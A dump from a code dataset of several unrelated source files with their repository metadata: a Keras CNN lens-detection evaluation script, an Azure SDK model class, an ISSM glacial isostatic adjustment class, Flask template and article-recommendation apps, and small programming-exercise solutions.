            predicted_no_lens = np.count_nonzero(probabilities_known_lenses == 0)
            print("%s/%s known lenses predicted" % (predicted_lens, len(known_images)))
            print("%s/%s non known lenses predicted" % (predicted_no_lens, len(known_images)))
            # BUG FIX: previously passed the module-level
            # `predicted_class_probabilities_known_lenses` (pre-k-fold
            # predictions); report this fold's predictions instead.
            predicted_lenses, predicted_no_lenses = savePredictedLenses(known_des_names,
                                                                        probabilities_known_lenses,
                                                                        text_file_path='../Results/%s'
                                                                                       '/UnseenKnownLenses/'
                                                                                       'KFold_LensesPredicted.txt'
                                                                                       % dt_string,
                                                                        predicted_lenses_filepath='../Results/%s/'
                                                                                                  'UnseenKnownLenses'
                                                                                                  % dt_string)
            # Keep one random true positive and one random false negative per
            # fold for the summary plot; (None, None) when the fold has none.
            randomTP = None
            imageTP = None
            if predicted_lenses:
                randomTP = random.choice(predicted_lenses)
                filepathTP = unseen_known_file_path_all + '/%s' % randomTP
                imageTP = gettingRandomUnseenImage(filepathTP)
            true_positives[kf_counter] = (randomTP, imageTP)
            randomFN = None
            imageFN = None
            if predicted_no_lenses:
                randomFN = random.choice(predicted_no_lenses)
                filepathFN = unseen_known_file_path_all + '/%s' % randomFN
                imageFN = gettingRandomUnseenImage(filepathFN)
            false_negatives[kf_counter] = (randomFN, imageFN)
            test_matrix_list.append(test_confusion_matrix)
            unseen_matrix_list.append(unseen_confusion_matrix)
            select_matrix_list.append(select_confusion_matrix)
        # Aggregate fold statistics.
        test_scores_mean = np.mean(test_scores_list)
        test_loss_mean = np.mean(test_loss_list)
        test_scores_std = np.std(test_scores_list)
        unseen_scores_mean = np.mean(unseen_scores_list)
        unseen_loss_mean = np.mean(unseen_loss_list)
        unseen_scores_std = np.std(unseen_scores_list)
        select_scores_mean = np.mean(select_unseen_scores_list)
        select_loss_mean = np.mean(select_unseen_loss_list)
        select_scores_std = np.std(select_unseen_scores_list)
        print("Test Confusion Matrices: " + str(test_matrix_list))
        print("Test Scores: " + str(test_scores_list))
        print("Test Scores Mean: " + str(test_scores_mean))
        print("Test Scores Std: " + str(test_scores_std))
        print("Test Loss: " + str(test_loss_list))
        print("Test Loss Mean: " + str(test_loss_mean))
        print("Unseen Confusion Matrices: " + str(unseen_matrix_list))
        print("Unseen Scores: " + str(unseen_scores_list))
        print("Unseen Scores Mean: " + str(unseen_scores_mean))
        print("Unseen Scores Std: " + str(unseen_scores_std))
        print("Unseen Loss: " + str(unseen_loss_list))
        print("Unseen Loss Mean: " + str(unseen_loss_mean))
        print("Select Confusion Matrices: " + str(select_matrix_list))
        print("Select Score: " + str(select_unseen_scores_list))
        print("Select Scores Mean: " + str(select_scores_mean))
        print("Select Unseen Scores Std: " + str(select_scores_std))
        print("Select Loss: " + str(select_unseen_loss_list))
        print("Unseen Loss Mean: " + str(select_loss_mean))
        # Record the aggregates for the results spreadsheet.
        excel_headers.append("Test Loss Mean")
        excel_dictionary.append(test_loss_mean)
        excel_headers.append("Test Scores Mean")
        excel_dictionary.append(test_scores_mean)
        excel_headers.append("Test Scores Std")
        excel_dictionary.append(test_scores_std)
        excel_headers.append("Unseen Loss Mean")
        excel_dictionary.append(unseen_loss_mean)
        excel_headers.append("Unseen Known Lenses Mean")
        excel_dictionary.append(unseen_scores_mean)
        excel_headers.append("Unseen Known Lenses Std")
        excel_dictionary.append(unseen_scores_std)
        excel_headers.append("Select Loss Mean")
        excel_dictionary.append(select_loss_mean)
        excel_headers.append("Select Scores Mean")
        excel_dictionary.append(select_scores_mean)
        excel_headers.append("Select Std")
        excel_dictionary.append(select_scores_std)
        plt.plot(test_scores_list, color='red', label='Testing Scores')
        plt.plot(unseen_scores_list, color='blue', label='Unseen Known Lenses Scores')
        plt.plot(select_unseen_scores_list, color='green', label="Selected Unseen Known Lenses Scores")
        plt.xlabel('Folds')
        plt.ylabel('Accuracy')
        plt.legend()
        # BUG FIX: save before show — saving after plt.show() produced a blank
        # PNG with non-interactive backends.
        plt.savefig('../Results/%s/KFoldAccuracyScores.png' % dt_string)
        plt.show()
        plotKFold(true_positives, false_negatives)
def viewActivationLayers():
    """
    Save one positive and one negative training image together with the
    activation maps they produce in the trained, module-level `classifier`.

    Saves:
        PNGs under '../Results/<dt_string>/PositiveResults/' and
        '../Results/<dt_string>/NegativeResults/'.
    """
    # make positive and negative directory
    if not os.path.exists('../Results/%s/PositiveResults/' % dt_string):
        os.mkdir('../Results/%s/PositiveResults/' % dt_string)
    if not os.path.exists('../Results/%s/NegativeResults/' % dt_string):
        os.mkdir('../Results/%s/NegativeResults/' % dt_string)
    # Plot original positive image (a single image is loaded: max_num=1).
    img_positive_tensor = getPositiveImages('Training/PositiveAll', 1, input_shape=input_shape)
    positive_train_figure = plt.figure()
    plt.imshow(img_positive_tensor[0])
    # plt.show()
    print(img_positive_tensor.shape)
    positive_train_figure.savefig('../Results/%s/PositiveResults/PositiveTrainingFigure.png' % dt_string)
    plt.close()
    # Visualise Activations of positive image
    visualiseActivations(img_positive_tensor, base_dir='../Results/%s/PositiveResults/' % dt_string)
    # Plot original negative image
    img_negative_tensor = getNegativeImages('Training/Negative', 1, input_shape=input_shape)
    negative_train_figure = plt.figure()
    plt.imshow(img_negative_tensor[0])
    # plt.show()
    print(img_negative_tensor.shape)
    negative_train_figure.savefig('../Results/%s/NegativeResults/NegativeTrainingFigure.png' % dt_string)
    plt.close()
    # Visualise Activations of negative image
    visualiseActivations(img_negative_tensor, base_dir='../Results/%s/NegativeResults/' % dt_string)
def plotKFold(true_positives, false_negatives):
    """
    Plot, for each fold, one randomly chosen true-positive and one
    false-negative unseen known lens, and save the resulting image grid.

    Args:
        true_positives(dict): fold number (1-based) -> (DES name, image array);
                              the name is None when the fold predicted no lenses.
        false_negatives(dict): fold number (1-based) -> (DES name, image array);
                               the name is None when the fold missed no lenses.
    Saves:
        '../Results/<dt_string>/UnseenKnownLenses/KFoldImages.png'
    """
    fig, axs = plt.subplots(k_fold_num, 2)
    fig.tight_layout(pad=3.0)
    cols = ['True Positive', 'False Negative']
    for ax, col in zip(axs[0], cols):
        ax.set_title(col)
    for i in range(0, k_fold_num):
        axs[i, 0].text(x=-0.8, y=5, s="", rotation=90, va="center")
        axs[i, 0].set_ylabel("k = %s" % (i + 1))
        # BUG FIX: previously indexed with the constant `k_fold_num`, so every
        # row displayed the final fold's images; use this row's fold number.
        true_positive_tuple = true_positives.get(i + 1)
        if true_positive_tuple is not None and true_positive_tuple[0] is not None:
            axs[i, 0].set_xlabel(true_positive_tuple[0], fontsize=8)
            axs[i, 0].imshow(true_positive_tuple[1])
            axs[i, 0].set_xticks([], [])
            axs[i, 0].set_yticks([], [])
        false_negative_tuple = false_negatives.get(i + 1)
        if false_negative_tuple is not None and false_negative_tuple[0] is not None:
            axs[i, 1].set_xlabel(false_negative_tuple[0], fontsize=8)
            axs[i, 1].imshow(false_negative_tuple[1])
            axs[i, 1].set_xticks([], [])
            axs[i, 1].set_yticks([], [])
    fig.tight_layout()
    # BUG FIX: save before show — saving after plt.show() produced a blank PNG
    # with non-interactive backends.
    fig.savefig('../Results/%s/UnseenKnownLenses/KFoldImages.png' % dt_string)
    plt.show()
# __________________________________________________________________________
# MAIN
# ---------------------------------------------------------------------------
# 1. Load training images and record their shapes for the results spreadsheet.
# Get positive training data
train_pos = getPositiveImages(images_dir=training_positive_path, max_num=max_num, input_shape=input_shape)
print("Train Positive Shape: " + str(train_pos.shape))
excel_headers.append("Train_Positive_Shape")
excel_dictionary.append(train_pos.shape)

# Get negative training data
train_neg = getNegativeImages(images_dir=training_negative_path, max_num=max_num, input_shape=input_shape)
print("Train Negative Shape: " + str(train_neg.shape))
excel_headers.append("Train_Negative_Shape")
excel_dictionary.append(train_neg.shape)

# 2. Combine, optionally augment, and split into training/validation sets.
all_training_data, all_training_labels, _ = makeImageSet(train_pos, train_neg, shuffle_needed=use_shuffle)
if use_augmented_data:
    all_training_data, all_training_labels = createAugmentedData(all_training_data, all_training_labels)
training_data, val_data, training_labels, val_labels = train_test_split(all_training_data,
                                                                        all_training_labels,
                                                                        test_size=validation_split,
                                                                        shuffle=True)
excel_headers.append("All_Training_Data_Shape")
# NOTE(review): the *labels* shape is appended under the data-shape header —
# presumably this should be `all_training_data.shape`; confirm before trusting the CSV.
excel_dictionary.append(all_training_labels.shape)
excel_headers.append("All_Training_Labels_Shape")
excel_dictionary.append(all_training_labels.shape)
excel_headers.append("Training_Data_Shape")
excel_dictionary.append(training_data.shape)
excel_headers.append("Validation_Data_Shape")
excel_dictionary.append(val_data.shape)
excel_headers.append("Training_Labels_Shape")
excel_dictionary.append(training_labels.shape)
excel_headers.append("Validation_Labels_Shape")
excel_dictionary.append(val_labels.shape)
excel_headers.append("Validation_Split")
excel_dictionary.append(validation_split)

# 3. Train the CNN.
history, classifier = usingCnnModel(training_data,
                                    training_labels,
                                    val_data,
                                    val_labels)
#classifier.load_weights('best_weights.hdf5')
#classifier.save_weights('galaxies_cnn.h5')

excel_headers.append("Epochs")
excel_dictionary.append(epochs)
excel_headers.append("Batch_size")
excel_dictionary.append(batch_size)

# 4. Plot run metrics
acc = history.history['accuracy']
val_acc = history.history['val_accuracy']
loss = history.history['loss']
val_loss = history.history['val_loss']
number_of_completed_epochs = range(1, len(acc) + 1)

# Accuracies
train_val_accuracy_figure = plt.figure()
plt.plot(number_of_completed_epochs, acc, label='Training acc')
plt.plot(number_of_completed_epochs, val_acc, label='Validation acc')
plt.title('Training and validation accuracy')
plt.legend()
plt.xlabel("Epochs")
plt.ylabel("Accuracy")
# NOTE(review): savefig is called after plt.show(); with some backends the
# figure is flushed on show and the saved PNG comes out blank — consider
# saving first (same applies to the loss plot below).
plt.show()
train_val_accuracy_figure.savefig('../Results/%s/TrainingValidationAccuracy.png' % dt_string)
plt.close()

# Losses
train_val_loss_figure = plt.figure()
plt.plot(number_of_completed_epochs, loss, label='Training loss')
plt.plot(number_of_completed_epochs, val_loss, label='Validation loss')
plt.title('Training and validation loss')
plt.legend()
plt.xlabel("Epochs")
plt.ylabel("Loss")
plt.show()
train_val_loss_figure.savefig('../Results/%s/TrainingValidationLoss.png' % dt_string)
plt.close()

# make positive and negative results and plotting the activations of positive and negative images
viewActivationLayers()

# 5. Classifier evaluation on the unseen testing set.
test_pos = getPositiveImages(images_dir=testing_positive_path, max_num=max_num_testing, input_shape=input_shape)
test_neg = getNegativeImages(images_dir=testing_negative_path, max_num=max_num_testing, input_shape=input_shape)
testing_data, testing_labels, _ = makeImageSet(test_pos, test_neg, shuffle_needed=True)
print("Testing Data Shape: " + str(testing_data.shape))
print("Testing Labels Shape: " + str(testing_labels.shape))
print("Got Unseen Testing data")
scores = classifier.evaluate(testing_data, testing_labels, batch_size=batch_size)
loss = scores[0]
accuracy = scores[1]
print("Test loss: %s" % loss)
print("Test accuracy: %s" % accuracy)
excel_headers.append("Test_Loss")
excel_dictionary.append(loss)
excel_headers.append("Test_Accuracy")
excel_dictionary.append(accuracy)
gettingTrueFalsePositiveNegatives(testing_data,
                                  testing_labels,
                                  text_file_path='../Results/%s/TrainingTestingResults/PredictedMatrixBeforeKFOLD.txt'
                                                 % dt_string,
                                  predicted_lenses_filepath='../Results/%s/TrainingTestingResults' % dt_string)

# 6. Evaluation on all unseen known lenses.
unseen_known_images = getUnseenData(images_dir=unseen_known_file_path_all,
                                    max_num=max_num_prediction,
                                    input_shape=input_shape)
known_images, known_labels, known_des_names = makeImageSet(positive_images=list(unseen_known_images.values()),
                                                           tile_names=list(unseen_known_images.keys()),
                                                           shuffle_needed=True)
print("Unseen Known Images Shape: " + str(known_images.shape))
print("Unseen Known Labels Shape: " + str(known_labels.shape))
print("Got Unseen Known Lenses Data")
unseen_scores = classifier.evaluate(known_images, known_labels, batch_size=batch_size)
unseen_loss_score = unseen_scores[0]
unseen_accuracy_score = unseen_scores[1]
print("Unseen loss: %s" % unseen_loss_score)
print("Unseen accuracy: %s" % unseen_accuracy_score)
excel_headers.append("Unseen_Loss")
excel_dictionary.append(unseen_loss_score)
excel_headers.append("Unseen_Accuracy")
excel_dictionary.append(unseen_accuracy_score)
predicted_class_probabilities_known_lenses = classifier.predict_classes(known_images, batch_size=batch_size)
lens_predicted = np.count_nonzero(predicted_class_probabilities_known_lenses == 1)
non_lens_predicted = np.count_nonzero(predicted_class_probabilities_known_lenses == 0)
print("%s/%s known lenses predicted" % (lens_predicted, len(known_images)))
print("%s/%s non known lenses predicted" % (non_lens_predicted, len(known_images)))
gettingTrueFalsePositiveNegatives(known_images, known_labels,
                                  text_file_path='../Results/%s/UnseenKnownLenses/PredictedMatrixBeforeKFOLD.txt' % dt_string,
                                  predicted_lenses_filepath='../Results/%s/UnseenKnownLenses' % dt_string)
predicted_lenses, predicted_no_lenses = savePredictedLenses(known_des_names,
                                                            predicted_class_probabilities_known_lenses,
                                                            text_file_path='../Results/%s/UnseenKnownLenses/'
                                                                           'PredictedMatrixBeforeKFOLD.txt' % dt_string,
                                                            predicted_lenses_filepath='../Results/%s/UnseenKnownLenses'
                                                                                      % dt_string)
######################################################################################
# 7. Evaluation on the selected subset of unseen known lenses.
unseen_known_images_select = getUnseenData(images_dir=unseen_known_file_path_select,
                                           max_num=max_num_prediction,
                                           input_shape=input_shape)
select_known_images, select_known_labels, select_known_des_names = makeImageSet(
    positive_images=list(unseen_known_images_select.values()),
    tile_names=list(unseen_known_images_select.keys()),
    shuffle_needed=True)
print("Unseen Selected Known Images Shape: " + str(select_known_images.shape))
print("Unseen Selected Known Labels Shape: " + str(select_known_labels.shape))
print("Got Unseen Selected Known Lenses Data")
select_unseen_scores = classifier.evaluate(select_known_images, select_known_labels, batch_size=batch_size)
select_unseen_loss_score = select_unseen_scores[0]
select_unseen_accuracy_score = select_unseen_scores[1]
print("Unseen Selected loss: %s" % select_unseen_loss_score)
print("Unseen Selected accuracy: %s" % select_unseen_accuracy_score)
excel_headers.append("Selected Unseen_Loss")
excel_dictionary.append(select_unseen_loss_score)
excel_headers.append("Select Unseen_Accuracy")
excel_dictionary.append(select_unseen_accuracy_score)
select_predicted_class_probabilities_known_lenses = classifier.predict_classes(select_known_images,
                                                                               batch_size=batch_size)
select_lens_predicted = np.count_nonzero(select_predicted_class_probabilities_known_lenses == 1)
select_non_lens_predicted = np.count_nonzero(select_predicted_class_probabilities_known_lenses == 0)
print("%s/%s known lenses predicted" % (select_lens_predicted, len(select_known_images)))
print("%s/%s non known lenses predicted" % (select_non_lens_predicted, len(select_known_images)))
gettingTrueFalsePositiveNegatives(select_known_images, select_known_labels,
                                  text_file_path='../Results/%s/UnseenKnownLensesSelect/PredictedMatrixBeforeKFOLD.txt' % dt_string,
                                  predicted_lenses_filepath='../Results/%s/UnseenKnownLensesSelect' % dt_string)
# NOTE(review): the text_file_path below contains a stray space
# ('UnseenKnownLensesSelect/ PredictedMatrixBeforeKFOLD.txt') — the report file
# name starts with a space; confirm this is intended.
select_predicted_lenses, select_predicted_no_lenses = savePredictedLenses(select_known_des_names,
                                                                          select_predicted_class_probabilities_known_lenses,
                                                                          text_file_path='../Results/%s'
                                                                                         '/UnseenKnownLensesSelect/ '
                                                                                         'PredictedMatrixBeforeKFOLD'
                                                                                         '.txt' % dt_string,
                                                                          predicted_lenses_filepath='../Results/%s'
                                                                                                    '/UnseenKnownLensesSelect'
                                                                                                    % dt_string)
excel_headers.append("Selected Unseen_Known_Lenses_Predicted")
excel_dictionary.append(select_lens_predicted)
excel_headers.append("Selected Unseen_Known_Lenses_No_Lens_Predicted")
excel_dictionary.append(select_non_lens_predicted)

# 8. K fold for training data
executeKFoldValidation(training_data,
                       training_labels,
                       val_data,
                       val_labels,
                       testing_data,
                       testing_labels,
                       known_images,
                       known_labels,
                       known_des_names,
                       select_known_images, select_known_labels)

# 9. Persist the collected headers/values to the results CSV.
if makeNewCSVFile:
    createExcelSheet('../Results/Architecture_kerasCNN_Results.csv', excel_headers)
    writeToFile('../Results/Architecture_kerasCNN_Results.csv', excel_dictionary)
else:
    writeToFile('../Results/Architecture_kerasCNN_Results.csv', excel_dictionary)
|
[
"annarien.bester@gmail.com"
] |
annarien.bester@gmail.com
|
516e00001cc17c4e8ab48673154d9f69351bbfe1
|
50948d4cb10dcb1cc9bc0355918478fb2841322a
|
/azure-mgmt-containerregistry/azure/mgmt/containerregistry/v2018_09_01/models/task_run_request.py
|
2f2ed7a707c8b543f090be7f386215b7b75e10ce
|
[
"MIT"
] |
permissive
|
xiafu-msft/azure-sdk-for-python
|
de9cd680b39962702b629a8e94726bb4ab261594
|
4d9560cfd519ee60667f3cc2f5295a58c18625db
|
refs/heads/master
| 2023-08-12T20:36:24.284497
| 2019-05-22T00:55:16
| 2019-05-22T00:55:16
| 187,986,993
| 1
| 0
|
MIT
| 2020-10-02T01:17:02
| 2019-05-22T07:33:46
|
Python
|
UTF-8
|
Python
| false
| false
| 1,824
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .run_request import RunRequest
class TaskRunRequest(RunRequest):
    """The parameters for a task run request.

    All required parameters must be populated in order to send to Azure.

    :param is_archive_enabled: The value that indicates whether archiving is
     enabled for the run or not. Default value: False .
    :type is_archive_enabled: bool
    :param type: Required. Constant filled by server.
    :type type: str
    :param task_name: Required. The name of task against which run has to be
     queued.
    :type task_name: str
    :param values: The collection of overridable values that can be passed
     when running a task.
    :type values:
     list[~azure.mgmt.containerregistry.v2018_09_01.models.SetValue]
    """

    # Client-side validation rules enforced by msrest before the request is sent.
    _validation = {
        'type': {'required': True},
        'task_name': {'required': True},
    }

    # Maps Python attribute names to wire-format JSON keys and msrest type codes.
    _attribute_map = {
        'is_archive_enabled': {'key': 'isArchiveEnabled', 'type': 'bool'},
        'type': {'key': 'type', 'type': 'str'},
        'task_name': {'key': 'taskName', 'type': 'str'},
        'values': {'key': 'values', 'type': '[SetValue]'},
    }

    def __init__(self, **kwargs):
        super(TaskRunRequest, self).__init__(**kwargs)
        self.task_name = kwargs.get('task_name', None)
        self.values = kwargs.get('values', None)
        # Polymorphic discriminator identifying this RunRequest subtype on the wire.
        self.type = 'TaskRunRequest'
|
[
"lmazuel@microsoft.com"
] |
lmazuel@microsoft.com
|
26e5e03a43169c15a3fd647c4f0679d97ffa81ca
|
d80c7fe8288acfd02fa79e240183c418e522d1aa
|
/1-Basics/Test/Q3/Test.py
|
fe3ac9d72f23225da1bc1dff45214d3059d66be5
|
[] |
no_license
|
4ratkm88/COM404
|
82beeb84e7f6713a666038311e0d3e86d94ecc2e
|
5bf81d520ec44e19d15e2ee333c81542316c7833
|
refs/heads/master
| 2020-07-31T09:15:00.658014
| 2019-12-10T11:09:09
| 2019-12-10T11:09:09
| 210,556,814
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 166
|
py
|
# Count down across the requested number of zones, announcing each crossing.
print("How many zones must I cross?")
zones_to_cross = int(input())
current = zones_to_cross
while current > 0:
    print("…crossed zone " + str(current))
    current -= 1
print("Crossed all zones. Jumanji!")
|
[
"4ratkm88@solent.ac.uk"
] |
4ratkm88@solent.ac.uk
|
9f99434b0414a1ef779501b64fddd6cde711ca08
|
93022749a35320a0c5d6dad4db476b1e1795e318
|
/issm/giaivins.py
|
8b3e6e1be28e45ec640be9f57bc01bb251bc69f2
|
[
"BSD-3-Clause"
] |
permissive
|
pf4d/issm_python
|
78cd88e9ef525bc74e040c1484aaf02e46c97a5b
|
6bf36016cb0c55aee9bf3f7cf59694cc5ce77091
|
refs/heads/master
| 2022-01-17T16:20:20.257966
| 2019-07-10T17:46:31
| 2019-07-10T17:46:31
| 105,887,661
| 2
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,277
|
py
|
from issm.fielddisplay import fielddisplay
from issm.project3d import project3d
from issm.checkfield import checkfield
from issm.WriteData import WriteData
class giaivins(object):
    """
    GIA (glacial isostatic adjustment, Ivins model) class definition

       Usage:
          giaivins=giaivins();
    """

    def __init__(self):  # {{{
        # NaN means "no constraint" for both physical fields.
        self.mantle_viscosity = float('NaN')
        self.lithosphere_thickness = float('NaN')
        self.cross_section_shape = 0
        # Apply the model defaults (sets cross_section_shape to 1).
        self.setdefaultparameters()
    # }}}

    def __repr__(self):  # {{{
        parts = [' giaivins solution parameters:']
        parts.append(fielddisplay(self,'mantle_viscosity','mantle viscosity constraints (NaN means no constraint) (Pa s)'))
        parts.append(fielddisplay(self,'lithosphere_thickness','lithosphere thickness constraints (NaN means no constraint) (m)'))
        parts.append(fielddisplay(self,'cross_section_shape',"1: square-edged, 2: elliptical-edged surface"))
        return '\n'.join(parts)
    # }}}

    def extrude(self, md):  # {{{
        # Project the 2d nodal fields onto the extruded 3d mesh.
        self.mantle_viscosity = project3d(md,'vector',self.mantle_viscosity,'type','node')
        self.lithosphere_thickness = project3d(md,'vector',self.lithosphere_thickness,'type','node')
        return self
    # }}}

    def setdefaultparameters(self):  # {{{
        self.cross_section_shape = 1
        return self
    # }}}

    def checkconsistency(self, md, solution, analyses):  # {{{
        # Early return: nothing to check unless a GIA analysis was requested.
        if 'GiaAnalysis' not in analyses:
            return md

        # Both nodal fields must be finite (or NaN = unconstrained) and positive.
        for fieldname in ('gia.mantle_viscosity', 'gia.lithosphere_thickness'):
            md = checkfield(md,'fieldname',fieldname,'NaN',1,'Inf',1,'size',[md.mesh.numberofvertices],'>',0)
        md = checkfield(md,'fieldname','gia.cross_section_shape','numel',[1],'values',[1,2])

        #be sure that if we are running a masstransport ice flow model coupled with giaivins, that thickness forcings
        #are not provided into the future.
        return md
    # }}}

    def marshall(self, prefix, md, fid):  # {{{
        WriteData(fid,prefix,'object',self,'fieldname','mantle_viscosity','format','DoubleMat','mattype',1)
        # Scaled by 1e3 on write — presumably stored in km, written in m; verify.
        WriteData(fid,prefix,'object',self,'fieldname','lithosphere_thickness','format','DoubleMat','mattype',1,'scale',10.**3.)
        WriteData(fid,prefix,'object',self,'fieldname','cross_section_shape','format','Integer')
    # }}}
|
[
"cummings.evan@gmail.com"
] |
cummings.evan@gmail.com
|
fa4c4bebb84eeea7871eaf044e4ec0be599f769c
|
3d9506b859cdbf38a21549cd3d64b69ecde7674e
|
/GoogleCodeJam/2020KickstartRoundB/BusRoute.py
|
b7cceed2c849cd5b217cc8829a02467223137486
|
[] |
no_license
|
bradykim7/Algorithm
|
1ae4c6e4e6d72687b660ddf0768a9174cc8d7b8c
|
053210a1205f4e62b367f85b65dcb60fcad74008
|
refs/heads/master
| 2022-06-25T04:46:55.265058
| 2022-06-17T08:08:52
| 2022-06-17T08:08:52
| 233,500,101
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 349
|
py
|
import sys;


# Google Kick Start 2020 Round B, Bus Routes: for each test case read N and D,
# then subtract (D mod bus_interval) for every bus from the deadline D.
if __name__ == '__main__':
    case_count = int(input())
    for case_no in range(case_count):
        header = input().split()
        n = int(header[0])
        d = int(header[1])
        intervals = [int(tok) for tok in input().rstrip().split()]
        answer = d - sum(d % interval for interval in intervals)
        print('Case #%d: %d' % (case_no + 1, answer))
|
[
"bradykim777@gmail.com"
] |
bradykim777@gmail.com
|
c403719d00c3664c1b2cb6adf47318a985282c01
|
f54a87aa1196cbe9ac56dfab44295201444edeaf
|
/130818_FlaskTweets/ex.py
|
784dc936880419c67a4f50eee2b2e00e78ddae36
|
[] |
no_license
|
pythonflaskstudy2013/Weekly--Python-
|
66d291a1b48d3d7618235e1e141e1f1e40908ce2
|
5bf1416f10df3daa119d15f87c5cbb346ab6e81c
|
refs/heads/master
| 2020-03-27T01:11:07.148567
| 2013-09-01T04:13:46
| 2013-09-01T04:13:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,130
|
py
|
#!/usr/bin/env python
from flask import Flask
from flask import render_template, render_template_string, request
import math

app = Flask(__name__)

books = ['Programming in Scala', 'Mining the Social Web', 'Pattern-Oriented Software Architecture']


@app.route('/inherit')
def inherit():
    """Demonstrate template inheritance via a child template."""
    return render_template('child.html')


@app.route('/books')
def list():
    """Render the module-level book list."""
    return render_template('books.html', books=books)


@app.route('/animals')
def animals():
    """Render a fixed list of animals."""
    return render_template('animals.html', animals=[
        'cat', 'dog', 'pig', 'cow', 'sheep', 'panda', 'bear'
    ])


@app.route('/macro')
def forms():
    """Demonstrate Jinja macros."""
    return render_template('macro.html')


@app.route('/filter')
def filter():
    """Demonstrate the custom template filter below."""
    return render_template('filter.html')


@app.route('/custom')
def custom():
    """Demonstrate the custom test/global below."""
    return render_template('custom.html')


@app.template_filter()
def reverse(text):
    """Jinja filter: return *text* reversed."""
    return text[::-1]


@app.template_test()
def is_prime(n):
    """Jinja test: True iff *n* is a prime number.

    Bug fix: values below 2 previously fell through the trial-division
    loop and were reported prime (and negatives raised a math domain
    error inside math.sqrt). Guard them explicitly.
    """
    if n < 2:
        return False
    if n == 2:
        return True
    for i in range(2, int(math.ceil(math.sqrt(n))) + 1):
        if n % i == 0:
            return False
    return True


@app.template_global()
def whoami():
    """Jinja global: a fixed identity string."""
    return 'My Name is Daegeun'


app.run(debug=True)
|
[
"dgkim84@gmail.com"
] |
dgkim84@gmail.com
|
128d2a94962ecb1a54b4c9c3ca840004e656b188
|
9e241ae22cafe7ed4aaba2f06632420a63ec44fd
|
/Project 142/main.py
|
c30ed130f6ed02a9f977b69ffb0d69621d3dc3a8
|
[] |
no_license
|
Whitehat-Lataksh/Article-Recommending
|
b970f4d916733667aca20f85321710c1b40def62
|
ece145cc7b86288750339b38c319fd15e5490450
|
refs/heads/main
| 2023-08-11T20:23:14.510692
| 2021-09-17T04:55:17
| 2021-09-17T04:55:17
| 407,406,604
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,367
|
py
|
from flask import Flask, jsonify, request
from storage import all_articles, liked_articles, not_liked_articles
from demographic_filtering import output
from content_filtering import get_recommendations

app = Flask(__name__)


def _row_payload(row):
    # Rows used by the popular/recommended endpoints keep their fields at
    # indices 0..4: url, title, text, lang, total_events.
    return {
        "url": row[0],
        "title": row[1],
        "text": row[2],
        "lang": row[3],
        "total_events": row[4]
    }


@app.route("/get-article")
def get_article():
    """Return the article at the head of the queue (fields at indices 11..15)."""
    head = all_articles[0]
    movie_data = {
        "url": head[11],
        "title": head[12],
        "text": head[13],
        "lang": head[14],
        "total_events": head[15]
    }
    return jsonify({
        "data": movie_data,
        "status": "success"
    })


@app.route("/liked-article", methods=["POST"])
def liked_article():
    """Move the head article into the liked list."""
    liked_articles.append(all_articles.pop(0))
    return jsonify({"status": "success"}), 201


@app.route("/unliked-article", methods=["POST"])
def unliked_article():
    """Move the head article into the not-liked list."""
    not_liked_articles.append(all_articles.pop(0))
    return jsonify({"status": "success"}), 201


@app.route("/popular-articles")
def popular_articles():
    """Return the demographic-filtering output as JSON."""
    article_data = [_row_payload(row) for row in output]
    return jsonify({
        "data": article_data,
        "status": "success"
    }), 200


@app.route("/recommended-articles")
def recommended_articles():
    """Return content-based recommendations seeded by every liked article."""
    gathered = []
    for liked in liked_articles:
        for row in get_recommendations(liked[4]):
            gathered.append(row)

    import itertools
    # Sort, then keep one representative per group of equal rows (dedupe).
    gathered.sort()
    gathered = list(key for key, _ in itertools.groupby(gathered))

    article_data = [_row_payload(row) for row in gathered]
    return jsonify({
        "data": article_data,
        "status": "success"
    }), 200


if __name__ == "__main__":
    app.run()
|
[
"noreply@github.com"
] |
Whitehat-Lataksh.noreply@github.com
|
5d842f89dca376141a6a97ff7ced4635dd7d4015
|
82aa64e423bcd2d2ae77a58552417bee0e2e3c9a
|
/Python/Basic Data Types/Lists.py
|
a42ace84b7ade4cfccefe4845b940184473c576a
|
[] |
no_license
|
abhi1362/HackerRank
|
7cdbb8a2fadd42e749fc5a7ce8635c2c303a9057
|
95dcd35ba554023c3d74c6e6574a1fbedc5e7845
|
refs/heads/master
| 2021-12-29T19:54:52.750399
| 2018-01-28T07:06:00
| 2018-01-28T07:06:00
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,014
|
py
|
if __name__ == '__main__':
    N = int(input())
    array_list = []

    # Command handlers. They read the parsed arguments (value, index) and the
    # shared list from the enclosing module scope, so they take no parameters.
    def print_():
        print(array_list)

    def sort():
        array_list.sort()

    def pop():
        array_list.pop()

    def insert():
        array_list.insert(index, value)

    def append():
        array_list.append(value)

    def reverse():
        array_list.reverse()

    def remove():
        array_list.remove(value)

    # Dispatch table built once; the handlers capture state dynamically.
    dispatch = {
        "insert": insert,
        "remove": remove,
        "pop": pop,
        "reverse": reverse,
        "append": append,
        "sort": sort,
        "print": print_,
    }

    for _ in range(N):
        tokens = input().split()
        com = tokens[0]
        # One argument: it is both the value and (for insert-like use) the index.
        if len(tokens) >= 2:
            value = int(tokens[1])
            index = value
        # Two arguments: first is the index, second the value.
        if len(tokens) >= 3:
            value = int(tokens[2])
            index = int(tokens[1])
        dispatch[com]()
|
[
"prvnbeloved@gmail.com"
] |
prvnbeloved@gmail.com
|
3db3cc00113a6fb614fa79bc5f0a9a2b4972075f
|
de17da755ea35e928afbaf48d41c23053e43af8a
|
/CourseSite/courses/migrations/0023_auto_20180426_1616.py
|
fa77713cabba30af89bec7958051af1a7c5157c2
|
[] |
no_license
|
m-gautam/Course_SIte-Project-
|
353aaec6695ca769cd16f38a0118ae4abc52bf9e
|
2b2cd1f3f4f85fec5c4b18355c111c67ce6dfcd0
|
refs/heads/master
| 2021-04-26T22:47:21.042398
| 2020-05-17T21:15:47
| 2020-05-17T21:15:47
| 124,147,812
| 1
| 0
